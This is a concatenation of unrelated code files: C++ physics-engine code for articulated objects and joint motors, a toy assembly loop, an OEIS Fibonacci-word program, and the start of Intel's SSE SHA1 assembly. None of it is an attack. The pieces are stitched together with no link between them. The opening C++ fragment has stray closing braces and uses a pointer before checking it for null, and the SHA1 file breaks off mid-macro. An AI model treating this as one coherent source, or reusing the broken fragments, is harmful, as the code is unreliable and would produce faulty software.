// prepare for link
col = btMultiBody_->getLink(m).m_collider;
tr = col->getWorldTransform();
if (col == nullptr) {
continue;
}
}
if (col->getBroadphaseHandle()->m_collisionFilterGroup ==
int(CollisionGroup::Static)) {
// accumulate shapes in the new compound
if (bFixedObjectShape_ == nullptr) {
bFixedObjectShape_ = std::make_unique<btCompoundShape>();
}
bFixedObjectShape_->addChildShape(tr, col->getCollisionShape());
// disable collisions for the old object
col->getBroadphaseHandle()->m_collisionFilterGroup =
int(CollisionGroup::Noncollidable);
col->getBroadphaseHandle()->m_collisionFilterMask = uint32_t(
CollisionGroupHelper::getMaskForGroup(CollisionGroup::Noncollidable));
}
}
// create the proxy btRigidBody to replace the static shapes
if (bFixedObjectShape_ != nullptr) {
btRigidBody::btRigidBodyConstructionInfo info =
btRigidBody::btRigidBodyConstructionInfo(0.f, nullptr,
bFixedObjectShape_.get());
bFixedObjectRigidBody_ = std::make_unique<btRigidBody>(info);
bWorld_->addRigidBody(
bFixedObjectRigidBody_.get(), int(CollisionGroup::Static),
uint32_t(
CollisionGroupHelper::getMaskForGroup(CollisionGroup::Static)));
collisionObjToObjIds_->emplace(bFixedObjectRigidBody_.get(), objectId_);
}
}
void BulletArticulatedObject::updateNodes(bool force) {
isDeferringUpdate_ = false;
if (force || btMultiBody_->getBaseCollider()->isActive()) {
setRotationScalingFromBulletTransform(btMultiBody_->getBaseWorldTransform(),
&node());
}
// update link transforms
for (auto& link : links_) {
if (force || btMultiBody_->getLinkCollider(link.first)->isActive())
setRotationScalingFromBulletTransform(
btMultiBody_->getLink(link.first).m_cachedWorldTransform,
&link.second->node());
}
}
////////////////////////////
// BulletArticulatedLink
////////////////////////////
void BulletArticulatedObject::resetStateFromSceneInstanceAttr(
CORRADE_UNUSED bool defaultCOMCorrection) {
auto sceneObjInstanceAttr = getSceneInstanceAttributes();
if (!sceneObjInstanceAttr) {
// if no scene instance attributes specified, no initial state is set
return;
}
// Set whether dofs should be clamped to limits before phys step
autoClampJointLimits_ = sceneObjInstanceAttr->getAutoClampJointLimits();
// now move objects
// set object's location and rotation based on translation and rotation
// params specified in instance attributes
auto translate = sceneObjInstanceAttr->getTranslation();
// construct initial transformation state.
Mn::Matrix4 state = Mn::Matrix4::from(
sceneObjInstanceAttr->getRotation().toMatrix(), translate);
setTransformation(state);
// set object's motion type if different than set value
const physics::MotionType attrObjMotionType =
static_cast<physics::MotionType>(sceneObjInstanceAttr->getMotionType());
if (attrObjMotionType != physics::MotionType::UNDEFINED) {
setMotionType(attrObjMotionType);
}
// set initial joint positions
// get array of existing joint dofs
std::vector<float> aoJointPose = getJointPositions();
// get instance-specified initial joint positions
const auto& initJointPos = sceneObjInstanceAttr->getInitJointPose();
// map instance vals into
size_t idx = 0;
for (const auto& elem : initJointPos) {
if (idx >= aoJointPose.size()) {
ESP_WARNING() << "Attempting to specify more initial joint poses than "
"exist in articulated object"
<< sceneObjInstanceAttr->getHandle() << ", so skipping";
break;
}
aoJointPose[idx++] = elem.second;
}
setJointPositions(aoJointPose);
// set initial joint velocities
// get array of existing joint vel dofs
std::vector<float> aoJointVels = getJointVelocities();
// get instance-specified initial joint velocities
const std::map<std::string, float>& initJointVel =
sceneObjInstanceAttr->getInitJointVelocities();
idx = 0;
for (const auto& elem : initJointVel) {
if (idx >= aoJointVels.size()) {
ESP_WARNING()
<< "Attempting to specify more initial joint velocities than "
"exist in articulated object"
<< sceneObjInstanceAttr->getHandle() << ", so skipping";
break;
}
aoJointVels[idx++] = elem.second;
}
setJointVelocities(aoJointVels);
} // BulletArticulatedObject::resetStateFromSceneInstanceAttr
void BulletArticulatedObject::setRootState(const Mn::Matrix4& state) {
btTransform tr{state};
btMultiBody_->setBaseWorldTransform(tr);
if (bFixedObjectRigidBody_) {
bFixedObjectRigidBody_->setWorldTransform(tr);
}
// update the simulation state
updateKinematicState();
}
Mn::Vector3 BulletArticulatedObject::getRootLinearVelocity() const {
return Mn::Vector3(btMultiBody_->getBaseVel());
}
void BulletArticulatedObject::setRootLinearVelocity(const Mn::Vector3& linVel) {
btMultiBody_->setBaseVel(btVector3(linVel));
}
Mn::Vector3 BulletArticulatedObject::getRootAngularVelocity() const {
return Mn::Vector3(btMultiBody_->getBaseOmega());
}
void BulletArticulatedObject::setRootAngularVelocity(
const Mn::Vector3& angVel) {
btMultiBody_->setBaseOmega(btVector3(angVel));
}
void BulletArticulatedObject::setJointForces(const std::vector<float>& forces) {
if (forces.size() != size_t(btMultiBody_->getNumDofs())) {
ESP_DEBUG() << "Force vector size mis-match (input:" << forces.size()
<< ", expected:" << btMultiBody_->getNumDofs()
<< "), aborting.";
}
int dofCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
btMultibodyLink& link = btMultiBody_->getLink(i);
for (int dof = 0; dof < link.m_dofCount; ++dof) {
link.m_jointTorque[dof] = forces[dofCount];
dofCount++;
}
}
}
void BulletArticulatedObject::addJointForces(const std::vector<float>& forces) {
if (forces.size() != size_t(btMultiBody_->getNumDofs())) {
ESP_DEBUG() << "Force vector size mis-match (input:" << forces.size()
<< ", expected:" << btMultiBody_->getNumDofs()
<< "), aborting.";
}
int dofCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
btMultibodyLink& link = btMultiBody_->getLink(i);
for (int dof = 0; dof < link.m_dofCount; ++dof) {
link.m_jointTorque[dof] += forces[dofCount];
dofCount++;
}
}
}
std::vector<float> BulletArticulatedObject::getJointForces() {
std::vector<float> forces(btMultiBody_->getNumDofs());
int dofCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
btScalar* dofForces = btMultiBody_->getJointTorqueMultiDof(i);
for (int dof = 0; dof < btMultiBody_->getLink(i).m_dofCount; ++dof) {
forces[dofCount] = dofForces[dof];
dofCount++;
}
}
return forces;
}
void BulletArticulatedObject::setJointVelocities(
const std::vector<float>& vels) {
if (vels.size() != size_t(btMultiBody_->getNumDofs())) {
ESP_DEBUG() << "Velocity vector size mis-match (input:" << vels.size()
<< ", expected:" << btMultiBody_->getNumDofs()
<< "), aborting.";
}
int dofCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
if (btMultiBody_->getLink(i).m_dofCount > 0) {
// this const_cast is only needed for Bullet 2.87. It is harmless in any
// case.
btMultiBody_->setJointVelMultiDof(i, const_cast<float*>(&vels[dofCount]));
dofCount += btMultiBody_->getLink(i).m_dofCount;
}
}
}
std::vector<float> BulletArticulatedObject::getJointVelocities() {
std::vector<float> vels(btMultiBody_->getNumDofs());
int dofCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
btScalar* dofVels = btMultiBody_->getJointVelMultiDof(i);
for (int dof = 0; dof < btMultiBody_->getLink(i).m_dofCount; ++dof) {
vels[dofCount] = dofVels[dof];
dofCount++;
}
}
return vels;
}
void BulletArticulatedObject::setJointPositions(
const std::vector<float>& positions) {
if (positions.size() != size_t(btMultiBody_->getNumPosVars())) {
ESP_DEBUG(Mn::Debug::Flag::NoSpace)
<< "Position vector size mis-match (input:" << positions.size()
<< ", expected:" << btMultiBody_->getNumPosVars() << "), aborting.";
}
int posCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
auto& link = btMultiBody_->getLink(i);
if (link.m_posVarCount > 0) {
btMultiBody_->setJointPosMultiDof(
i, const_cast<float*>(&positions[posCount]));
posCount += link.m_posVarCount;
}
}
// update the simulation state
updateKinematicState();
}
std::vector<float> BulletArticulatedObject::getJointPositions() {
std::vector<float> positions(btMultiBody_->getNumPosVars());
int posCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
btScalar* linkPos = btMultiBody_->getJointPosMultiDof(i);
for (int pos = 0; pos < btMultiBody_->getLink(i).m_posVarCount; ++pos) {
positions[posCount] = linkPos[pos];
posCount++;
}
}
return positions;
}
std::pair<std::vector<float>, std::vector<float>>
BulletArticulatedObject::getJointPositionLimits() {
std::vector<float> lowerLimits(btMultiBody_->getNumPosVars(), -INFINITY);
std::vector<float> upperLimits(btMultiBody_->getNumPosVars(), INFINITY);
int posCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
if (jointLimitConstraints.count(i) > 0) {
// a joint limit constraint exists for this link's parent joint
auto& jlc = jointLimitConstraints.at(i);
lowerLimits[posCount] = jlc.lowerLimit;
upperLimits[posCount] = jlc.upperLimit;
posCount++;
} else {
posCount += btMultiBody_->getLink(i).m_posVarCount;
}
}
CORRADE_INTERNAL_ASSERT(posCount == btMultiBody_->getNumPosVars());
return std::make_pair(lowerLimits, upperLimits);
}
void BulletArticulatedObject::addArticulatedLinkForce(int linkId,
Mn::Vector3 force) {
CORRADE_INTERNAL_ASSERT(getNumLinks() > linkId);
btMultiBody_->addLinkForce(linkId, btVector3{force});
}
float BulletArticulatedObject::getArticulatedLinkFriction(int linkId) {
CORRADE_INTERNAL_ASSERT(getNumLinks() > linkId);
return btMultiBody_->getLinkCollider(linkId)->getFriction();
}
void BulletArticulatedObject::setArticulatedLinkFriction(int linkId,
float friction) {
CORRADE_INTERNAL_ASSERT(getNumLinks() > linkId);
btMultiBody_->getLinkCollider(linkId)->setFriction(friction);
}
JointType BulletArticulatedObject::getLinkJointType(int linkId) const {
CORRADE_INTERNAL_ASSERT(getNumLinks() > linkId && linkId >= 0);
return JointType(int(btMultiBody_->getLink(linkId).m_jointType));
}
int BulletArticulatedObject::getLinkDoFOffset(int linkId) const {
CORRADE_INTERNAL_ASSERT(getNumLinks() > linkId && linkId >= 0);
return btMultiBody_->getLink(linkId).m_dofOffset;
}
int BulletArticulatedObject::getLinkNumDoFs(int linkId) const {
CORRADE_INTERNAL_ASSERT(getNumLinks() > linkId && linkId >= 0);
return btMultiBody_->getLink(linkId).m_dofCount;
}
int BulletArticulatedObject::getLinkJointPosOffset(int linkId) const {
CORRADE_INTERNAL_ASSERT(getNumLinks() > linkId && linkId >= 0);
return btMultiBody_->getLink(linkId).m_cfgOffset;
}
int BulletArticulatedObject::getLinkNumJointPos(int linkId) const {
CORRADE_INTERNAL_ASSERT(getNumLinks() > linkId && linkId >= 0);
return btMultiBody_->getLink(linkId).m_posVarCount;
}
void BulletArticulatedObject::reset() {
// reset positions and velocities to zero
// clears forces/torques
// Note: does not update root state
std::vector<float> zeros(btMultiBody_->getNumPosVars(), 0.0f);
// handle spherical quaternions
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
auto& link = btMultiBody_->getLink(i);
if (link.m_jointType ==
btMultibodyLink::eFeatherstoneJointType::eSpherical) {
// need a valid identity quaternion [0,0,0,1]
zeros[link.m_cfgOffset + 3] = 1;
}
}
// also updates kinematic state
setJointPositions(zeros);
btMultiBody_->clearConstraintForces();
btMultiBody_->clearVelocities();
btMultiBody_->clearForcesAndTorques();
}
void BulletArticulatedObject::setActive(bool active) {
if (!active) {
btMultiBody_->goToSleep();
} else {
btMultiBody_->wakeUp();
}
}
bool BulletArticulatedObject::isActive() const {
return btMultiBody_->isAwake();
}
bool BulletArticulatedObject::getCanSleep() {
return btMultiBody_->getCanSleep();
}
void BulletArticulatedObject::setMotionType(MotionType mt) {
if (mt == objectMotionType_) {
return;
}
if (mt == MotionType::UNDEFINED) {
return;
}
// only need to change the state if the previous state was different (i.e.,
// DYNAMIC -> other)
if (mt == MotionType::DYNAMIC) {
bWorld_->addMultiBody(btMultiBody_.get());
} else if (objectMotionType_ == MotionType::DYNAMIC) {
// TODO: STATIC and KINEMATIC are equivalent for simplicity. Could manually
// limit STATIC...
bWorld_->removeMultiBody(btMultiBody_.get());
}
objectMotionType_ = mt;
}
void BulletArticulatedObject::clampJointLimits() {
auto pose = getJointPositions();
bool poseModified = false;
// some small contrived error term for overflow
float corrective_eps = 0.000001;
int dofCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
if (jointLimitConstraints.count(i) > 0) {
// a joint limit constraint exists for this link
auto& jlc = jointLimitConstraints.at(i);
// position clamping:
if (pose[dofCount] < jlc.lowerLimit - corrective_eps) {
poseModified = true;
pose[dofCount] = jlc.lowerLimit;
} else if (pose[dofCount] > jlc.upperLimit + corrective_eps) {
poseModified = true;
pose[dofCount] = jlc.upperLimit;
}
}
// continue incrementing the dof counter
for (int dof = 0; dof < btMultiBody_->getLink(i).m_dofCount; ++dof) {
dofCount++;
}
}
if (poseModified) {
setJointPositions(pose);
}
}
void BulletArticulatedObject::updateKinematicState() {
btMultiBody_->forwardKinematics(scratch_q_, scratch_m_);
btMultiBody_->updateCollisionObjectWorldTransforms(scratch_q_, scratch_m_);
// Need to update the aabbs manually also for broadphase collision detection
for (int linkIx = 0; linkIx < btMultiBody_->getNumLinks(); ++linkIx) {
bWorld_->updateSingleAabb(btMultiBody_->getLinkCollider(linkIx));
}
bWorld_->updateSingleAabb(btMultiBody_->getBaseCollider());
if (bFixedObjectRigidBody_) {
bWorld_->updateSingleAabb(bFixedObjectRigidBody_.get());
}
// update visual shapes
if (!isDeferringUpdate_) {
updateNodes(true);
}
}
/**
* @brief Specific callback function for ArticulatedObject::contactTest to
* screen self-collisions.
*/
struct AOSimulationContactResultCallback
: public SimulationContactResultCallback {
btMultiBody* mb_ = nullptr;
btRigidBody* fixedBaseColObj_ = nullptr;
/**
* @brief Constructor taking the AO's btMultiBody as input to screen
* self-collisions.
*/
AOSimulationContactResultCallback(btMultiBody* mb,
btRigidBody* fixedBaseColObj)
: mb_(mb), fixedBaseColObj_(fixedBaseColObj) {
bCollision = false;
}
bool needsCollision(btBroadphaseProxy* proxy0) const override {
// base method checks for group|mask filter
bool collides = SimulationContactResultCallback::needsCollision(proxy0);
// check for self-collision
if (!mb_->hasSelfCollision()) {
// This should always be a valid conversion to btCollisionObject
auto* co = static_cast<btCollisionObject*>(proxy0->m_clientObject);
auto* mblc = dynamic_cast<btMultiBodyLinkCollider*>(co);
if (mblc) {
if (mblc->m_multiBody == mb_) {
// screen self-collisions
collides = false;
}
} else if (co == fixedBaseColObj_) {
// screen self-collisions w/ fixed base rigid
collides = false;
}
}
return collides;
}
};
bool BulletArticulatedObject::contactTest() {
AOSimulationContactResultCallback src(btMultiBody_.get(),
bFixedObjectRigidBody_.get());
auto* baseCollider = btMultiBody_->getBaseCollider();
// Do a contact test for each piece of the AO and return at soonest contact.
// Should be cheaper to hit multiple local aabbs than to check the full scene.
if (bFixedObjectRigidBody_) {
src.m_collisionFilterGroup =
bFixedObjectRigidBody_->getBroadphaseHandle()->m_collisionFilterGroup;
src.m_collisionFilterMask =
bFixedObjectRigidBody_->getBroadphaseHandle()->m_collisionFilterMask;
bWorld_->getCollisionWorld()->contactTest(bFixedObjectRigidBody_.get(),
src);
if (src.bCollision) {
return src.bCollision;
}
} else if (baseCollider) {
src.m_collisionFilterGroup =
baseCollider->getBroadphaseHandle()->m_collisionFilterGroup;
src.m_collisionFilterMask =
baseCollider->getBroadphaseHandle()->m_collisionFilterMask;
bWorld_->getCollisionWorld()->contactTest(baseCollider, src);
if (src.bCollision) {
return src.bCollision;
}
}
for (int colIx = 0; colIx < btMultiBody_->getNumLinks(); ++colIx) {
auto* linkCollider = btMultiBody_->getLinkCollider(colIx);
src.m_collisionFilterGroup =
linkCollider->getBroadphaseHandle()->m_collisionFilterGroup;
src.m_collisionFilterMask =
linkCollider->getBroadphaseHandle()->m_collisionFilterMask;
bWorld_->getCollisionWorld()->contactTest(linkCollider, src);
if (src.bCollision) {
return src.bCollision;
}
}
return false;
} // contactTest
// ------------------------
// Joint Motor API
// ------------------------
bool BulletArticulatedObject::supportsSingleDofJointMotor(int linkIx) const {
bool canHaveMotor = (btMultiBody_->getLink(linkIx).m_jointType ==
btMultibodyLink::eRevolute ||
btMultiBody_->getLink(linkIx).m_jointType ==
btMultibodyLink::ePrismatic);
return canHaveMotor;
}
std::unordered_map<int, int> BulletArticulatedObject::createMotorsForAllDofs(
const JointMotorSettings& settings) {
std::unordered_map<int, int> motorIdsToLinks;
// Reserve space. We have an upperbound on size.
motorIdsToLinks.reserve(btMultiBody_->getNumLinks());
auto settingsCopy = settings;
for (int linkIx = 0; linkIx < btMultiBody_->getNumLinks(); ++linkIx) {
if (supportsSingleDofJointMotor(linkIx)) {
settingsCopy.motorType = JointMotorType::SingleDof;
} else if (btMultiBody_->getLink(linkIx).m_jointType ==
btMultibodyLink::eSpherical) {
settingsCopy.motorType = JointMotorType::Spherical;
} else {
// skip the creation phase for unsupported joints
continue;
}
int motorId = createJointMotor(linkIx, settingsCopy);
motorIdsToLinks[motorId] = linkIx;
}
ESP_DEBUG() << "BulletArticulatedObject::createMotorsForAllDofs():"
<< motorIdsToLinks;
return motorIdsToLinks;
}
int BulletArticulatedObject::createJointMotor(
const int linkIndex,
const JointMotorSettings& settings) {
// check for valid configuration
ESP_CHECK(
links_.count(linkIndex) != 0,
"BulletArticulatedObject::createJointMotor - no link with linkIndex ="
<< linkIndex);
if (settings.motorType == JointMotorType::SingleDof) {
ESP_CHECK(supportsSingleDofJointMotor(linkIndex),
"BulletArticulatedObject::createJointMotor - "
"JointMotorSettings.motorType==SingleDof incompatible with joint"
<< linkIndex);
} else {
// JointMotorType::Spherical
ESP_CHECK(getLinkJointType(linkIndex) == JointType::Spherical,
"BulletArticulatedObject::createJointMotor - "
"JointMotorSettings.motorType==Spherical incompatible with joint"
<< linkIndex);
}
auto motor = JointMotor::create_unique();
motor->settings = settings;
motor->index = linkIndex;
motor->motorId = nextJointMotorId_;
jointMotors_.emplace(nextJointMotorId_,
std::move(motor)); // cache the Habitat structure
if (settings.motorType == JointMotorType::SingleDof) {
auto btMotor = std::make_unique<btMultiBodyJointMotor>(
btMultiBody_.get(), linkIndex, settings.velocityTarget,
settings.maxImpulse);
btMotor->setPositionTarget(settings.positionTarget, settings.positionGain);
btMotor->setVelocityTarget(settings.velocityTarget, settings.velocityGain);
bWorld_->addMultiBodyConstraint(btMotor.get());
btMotor->finalizeMultiDof();
articulatedJointMotors.emplace(
nextJointMotorId_, std::move(btMotor)); // cache the Bullet structure
} else {
// JointMotorType::Spherical
auto btMotor = std::make_unique<btMultiBodySphericalJointMotor>(
btMultiBody_.get(), linkIndex, settings.maxImpulse);
btMotor->setPositionTarget(btQuaternion(settings.sphericalPositionTarget),
settings.positionGain);
btMotor->setVelocityTarget(btVector3(settings.sphericalVelocityTarget),
settings.velocityGain);
bWorld_->addMultiBodyConstraint(btMotor.get());
btMotor->finalizeMultiDof();
articulatedSphericalJointMotors.emplace(
nextJointMotorId_, std::move(btMotor)); // cache the Bullet structure
}
// force activation if motors are updated
setActive(true);
return nextJointMotorId_++;
} // BulletArticulatedObject::createJointMotor
void BulletArticulatedObject::removeJointMotor(const int motorId) {
ESP_CHECK(jointMotors_.count(motorId) > 0,
"BulletArticulatedObject::removeJointMotor - No motor exists with "
"motorId ="
<< motorId);
if (articulatedJointMotors.count(motorId) != 0u) {
bWorld_->removeMultiBodyConstraint(
articulatedJointMotors.at(motorId).get());
articulatedJointMotors.erase(motorId);
} else if (articulatedSphericalJointMotors.count(motorId) != 0u) {
bWorld_->removeMultiBodyConstraint(
articulatedSphericalJointMotors.at(motorId).get());
articulatedSphericalJointMotors.erase(motorId);
} else {
ESP_ERROR() << "Cannot remove JointMotor: invalid ID (" << motorId << ").";
return;
}
jointMotors_.erase(motorId);
// force activation if motors are updated
btMultiBody_->wakeUp();
}
void BulletArticulatedObject::updateJointMotor(
const int motorId,
const JointMotorSettings& settings) {
ESP_CHECK(jointMotors_.count(motorId) > 0,
"BulletArticulatedObject::updateJointMotor - No motor exists with "
"motorId ="
<< motorId);
ESP_CHECK(jointMotors_.at(motorId)->settings.motorType == settings.motorType,
"BulletArticulatedObject::updateJointMotor - "
"JointMotorSettings.motorType does not match joint type.");
jointMotors_.at(motorId)->settings = settings;
if (articulatedJointMotors.count(motorId) != 0u) {
auto& motor = articulatedJointMotors.at(motorId);
motor->setPositionTarget(settings.positionTarget, settings.positionGain);
motor->setVelocityTarget(settings.velocityTarget, settings.velocityGain);
motor->setMaxAppliedImpulse(settings.maxImpulse);
} else if (articulatedSphericalJointMotors.count(motorId) != 0u) {
auto& motor = articulatedSphericalJointMotors.at(motorId);
motor->setPositionTarget(btQuaternion(settings.sphericalPositionTarget),
settings.positionGain);
motor->setVelocityTarget(btVector3(settings.sphericalVelocityTarget),
settings.velocityGain);
motor->setMaxAppliedImpulse(settings.maxImpulse);
} else {
ESP_ERROR() << "Cannot update JointMotor. Invalid ID (" << motorId << ").";
return;
}
// force activation if motors are updated
setActive(true);
}
void BulletArticulatedObject::updateAllMotorTargets(
const std::vector<float>& stateTargets,
bool velocities) {
ESP_CHECK(stateTargets.size() == velocities ? btMultiBody_->getNumDofs()
: btMultiBody_->getNumPosVars(),
"BulletArticulatedObject::updateAllMotorTargets - stateTargets "
"size does not match object state size.");
for (auto& motor : jointMotors_) {
btMultibodyLink& btLink = btMultiBody_->getLink(motor.second->index);
int startIndex = velocities ? btLink.m_dofOffset : btLink.m_cfgOffset;
auto& settings = motor.second->settings;
if (settings.motorType == JointMotorType::SingleDof) {
auto& btMotor = articulatedJointMotors.at(motor.first);
if (velocities) {
settings.velocityTarget = double(stateTargets[startIndex]);
btMotor->setVelocityTarget(settings.velocityTarget,
settings.velocityGain);
} else {
// positions
settings.positionTarget = double(stateTargets[startIndex]);
btMotor->setPositionTarget(settings.positionTarget,
settings.positionGain);
}
} else {
// JointMotorType::Spherical
if (velocities) {
settings.sphericalVelocityTarget = {stateTargets[startIndex],
stateTargets[startIndex + 1],
stateTargets[startIndex + 2]};
articulatedSphericalJointMotors.at(motor.first)
->setVelocityTarget(btVector3(settings.sphericalVelocityTarget),
settings.velocityGain);
} else {
// positions
settings.sphericalPositionTarget =
Mn::Quaternion(Mn::Vector3(stateTargets[startIndex],
stateTargets[startIndex + 1],
stateTargets[startIndex + 2]),
stateTargets[startIndex + 3])
.normalized();
articulatedSphericalJointMotors.at(motor.first)
->setPositionTarget(btQuaternion(settings.sphericalPositionTarget),
settings.positionGain);
}
}
}
// force activation when motors are updated
setActive(true);
}
} // namespace physics
} // namespace esp
|
again: movi r4 17
movi r1 twice
jalr r31 r1
movi r1 34
beq r1 r2 done
beq r0 r0 again
done: halt
twice: add r2 r4 r4
jalr r0 r31 |
; A014675: The infinite Fibonacci word (start with 1, apply 1->2, 2->21, take limit).
; 2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2,1,2,1,2,2,1,2,2,1,2,1,2,2
mov $9,$0
mov $11,2
lpb $11,1
clr $0,9
mov $0,$9
sub $11,1
add $0,$11
sub $0,1
mov $4,$0
add $4,2
add $7,5
mul $7,$4
div $4,18
sub $7,1
sub $7,$4
div $7,8
mov $1,$7
mov $12,$11
lpb $12,1
mov $10,$1
sub $12,1
lpe
lpe
lpb $9,1
mov $9,0
sub $10,$1
lpe
mov $1,$10
add $1,1
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Copyright(c) 2011-2016 Intel Corporation All rights reserved.
;
; Redistribution and use in source and binary forms, with or without
; modification, are permitted provided that the following conditions
; are met:
; * Redistributions of source code must retain the above copyright
; notice, this list of conditions and the following disclaimer.
; * Redistributions in binary form must reproduce the above copyright
; notice, this list of conditions and the following disclaimer in
; the documentation and/or other materials provided with the
; distribution.
; * Neither the name of Intel Corporation nor the names of its
; contributors may be used to endorse or promote products derived
; from this software without specific prior written permission.
;
; THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
; "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
; LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
; A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
; OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
; SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
; LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
; DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
; THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
; (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
; OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; code to compute 16 SHA1 using SSE
;;
%include "reg_sizes.asm"
default rel
;; Magic functions defined in FIPS 180-1
;;
; macro MAGIC_F0 F,B,C,D,T ;; F = (D ^ (B & (C ^ D)))
%macro MAGIC_F0 5
%define %%regF %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regT %5
movdqa %%regF,%%regC
pxor %%regF,%%regD
pand %%regF,%%regB
pxor %%regF,%%regD
%endmacro
; macro MAGIC_F1 F,B,C,D,T ;; F = (B ^ C ^ D)
%macro MAGIC_F1 5
%define %%regF %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regT %5
movdqa %%regF,%%regD
pxor %%regF,%%regC
pxor %%regF,%%regB
%endmacro
; macro MAGIC_F2 F,B,C,D,T ;; F = ((B & C) | (B & D) | (C & D))
%macro MAGIC_F2 5
%define %%regF %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regT %5
movdqa %%regF,%%regB
movdqa %%regT,%%regB
por %%regF,%%regC
pand %%regT,%%regC
pand %%regF,%%regD
por %%regF,%%regT
%endmacro
; macro MAGIC_F3 F,B,C,D,T ;; F = (B ^ C ^ D)
%macro MAGIC_F3 5
%define %%regF %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regT %5
MAGIC_F1 %%regF,%%regB,%%regC,%%regD,%%regT
%endmacro
; PROLD reg, imm, tmp
%macro PROLD 3
%define %%reg %1
%define %%imm %2
%define %%tmp %3
movdqa %%tmp, %%reg
pslld %%reg, %%imm
psrld %%tmp, (32-%%imm)
por %%reg, %%tmp
%endmacro
%macro SHA1_STEP_00_15 11
%define %%regA %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regE %5
%define %%regT %6
%define %%regF %7
%define %%memW %8
%define %%immCNT %9
%define %%MAGIC %10
%define %%data %11
paddd %%regE,%%immCNT
paddd %%regE,[%%data + (%%memW * 16)]
movdqa %%regT,%%regA
PROLD %%regT,5, %%regF
paddd %%regE,%%regT
%%MAGIC %%regF,%%regB,%%regC,%%regD,%%regT ;; FUN = MAGIC_Fi(B,C,D)
PROLD %%regB,30, %%regT
paddd %%regE,%%regF
%endmacro
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
%macro SHA1_STEP_16_79 11
%define %%regA %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regE %5
%define %%regT %6
%define %%regF %7
%define %%memW %8
%define %%immCNT %9
%define %%MAGIC %10
%define %%data %11
paddd %%regE,%%immCNT
movdqa W14, [%%data + ((%%memW - 14) & 15) * 16]
pxor W16, W14
pxor W16, [%%data + ((%%memW - 8) & 15) * 16]
pxor W16, [%%data + ((%%memW - 3) & 15) * 16]
movdqa %%regF, W16
pslld W16, 1
psrld %%regF, (32-1)
por %%regF, W16
ROTATE_W
movdqa [%%data + ((%%memW - 0) & 15) * 16],%%regF
paddd %%regE,%%regF
movdqa %%regT,%%regA
PROLD %%regT,5, %%regF
paddd %%regE,%%regT
%%MAGIC %%regF,%%regB,%%regC,%%regD,%%regT ;; FUN = MAGIC_Fi(B,C,D)
PROLD %%regB,30, %%regT
paddd %%regE,%%regF
%endmacro
;; Insert murmur's instructions into this macro.
;; Every section_loop of mh_sha1 calls SHA1_STEP_16_79 64 times and processes 256Byte.
;; So insert 1 murmur block into every 4 SHA1_STEP_16_79.
%define SHA1_STEP_16_79(J) SHA1_STEP_16_79_ %+ J
%macro SHA1_STEP_16_79_0 11
%define %%regA %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regE %5
%define %%regT %6
%define %%regF %7
%define %%memW %8
%define %%immCNT %9
%define %%MAGIC %10
%define %%data %11
paddd %%regE,%%immCNT
movdqa W14, [%%data + ((%%memW - 14) & 15) * 16]
pxor W16, W14
pxor W16, [%%data + ((%%memW - 8) & 15) * 16]
pxor W16, [%%data + ((%%memW - 3) & 15) * 16]
movdqa %%regF, W16
